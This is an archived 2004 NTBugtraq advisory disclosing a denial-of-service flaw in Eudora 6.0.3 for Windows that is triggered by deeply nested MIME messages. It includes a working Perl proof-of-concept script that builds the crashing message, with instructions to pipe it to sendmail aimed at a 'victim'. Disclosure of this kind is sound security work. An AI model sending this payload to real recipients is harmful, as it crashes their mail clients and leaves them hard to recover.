Eudora 6.0.3 nested MIME DoS

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 04/14/04

  • Next message: Ben Rampling: "NUL Character in message body locks up Outlook/Outlook Express"
    Date:         Wed, 14 Apr 2004 13:12:23 +1000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than
    2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file,
    users may find it difficult to recover from this DoS situation. Demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n";

    &nest(0);
    print "\n";

    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";

    # No problem for 1995, but crash for 2005 deep nesting:
    #
    # (378.1c4): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
    # eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53 push ebx

      if ($x < 2005) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }

    -----
    Earn up to 10 credit course hours toward the TruSecure ICSA Practitioner (TICSA) Credential and receive a TICSA exam coupon by attending the Infosecurity Canada 2004 conference. Featured speaker, Marcus J. Ranum, TruSecure inventor of the proxy firewall will present on June 3 at 11:30 AM. Visit <https://ticsa.trusecure.com> for certification details and <http://www.infosecuritycanada.com> for conference information. Become TICSA certified and see what happens!
    -----


  • Next message: Ben Rampling: "NUL Character in message body locks up Outlook/Outlook Express"